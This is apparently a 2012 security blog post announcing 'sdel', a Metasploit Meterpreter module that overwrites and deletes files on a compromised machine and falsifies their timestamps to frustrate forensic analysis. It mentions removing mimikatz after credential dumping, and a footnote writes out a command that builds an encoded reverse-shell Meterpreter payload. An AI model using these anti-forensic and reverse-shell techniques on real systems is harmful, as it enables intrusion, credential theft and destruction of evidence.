Safe Delete Meterpreter Module

16 de November de 2012 Por

It has recently been added to Metasploit (master branch) a module that can be interesting to delete files downloaded in a victim computer thru a meterpreter session.

This module, sdel, overwrites the file we want the number of times we choose, with random characters or null bytes (like the shred Linux command). Moreover, before deleting the file, it overwrites its name with a long string (200 bytes) and modifies its MACE attributes (access date, modification, creation and entry in the Master File Table (MFT)) making use of the API priv.fs.set_file_mace, as it is shown in its code.

As shown in the image, the new generated dates will correspond to the current date minus N random days .

Code of the change_mace function
It is worth to mention that in NTFS systems if the user wants to delete very small files, they could remain in the MFT stream descriptor and thus they would not be overwritten. The module sdel would alert the user, warning that the file to be deleted is less than 800 bytes. Sdel, therefore, overwrites the file content and the slack space (—lost— space left between the end of the file and the cluster used), but it won’t do a wipe of the free space. It is important to take this into account because files that use the encryption/compression of Windows, as well as temporal files, may remain scattered around the disk without being overwritten.

As its description shows, this module can be very useful when, for instance, in the phase of post exploitation of a victim computer the user needs to download an executable file to perform some action and after that to delete its contents safely, in order to make it difficult for a potential subsequent forensic analysis.

The use of sdel is simple. To overwrite and delete the desired file, the user only has to specify the number of overwriting iterations that must be performed and the type of overwriting (random or null bytes). These are the choices of the module:

Module options
Now suppose the following scenario. We have a meterpreter session [1] on a victim machine in which we used the tool mimikatz (tool to dump plaintext passwords from a Windows or obtaining hashes from SAM, among other features) and we want to delete after using it. We execute sdel setting three passes of file overwriting:

If after deleting a file with sdel we check its contents [2] on disk before and after the deletion, we can see that it has been overwritten properly. The following screenshots show the result before and after deleting a test file (msf.txt) on an NTFS filesystem.

File content on disk BEFORE being deleted by sdel

File content on disk AFTER being deleted by sdel

MFT content BEFORE deleting the file by sdel

MFT content AFTER deleting the file by sdel
As seen in previous images both the name and the contents MTF have been overwritten.

The module has been developed by Borja Merino (@borjamerino), regular author of this blog, and you can use it as far as you are using the last version of Metasploit.

[1] The tests have been performed with a VM with Windows 7 (X.X.X.51) and Backtrack 5 r3 (X.X.X.41) used to generate a executable file (meterpreter.exe) with payload windows/meterpreter/reverse_tcp coded with the algorithm shikata_ga_nai:

msfpayload windows/meterpreter/reverse_tcp LHOST=X.X.X.41 R | ./msfencode -e x86/shikata_ga_nai 
-c 10 -t exe -o meterpreter.exe

Executing the meterpreter.exe file in the victim machine and using Metasploit we obtain our reverse shell to connect to the victim computer:

Meterpreter session obtained
[2] The tool used has been WinHex.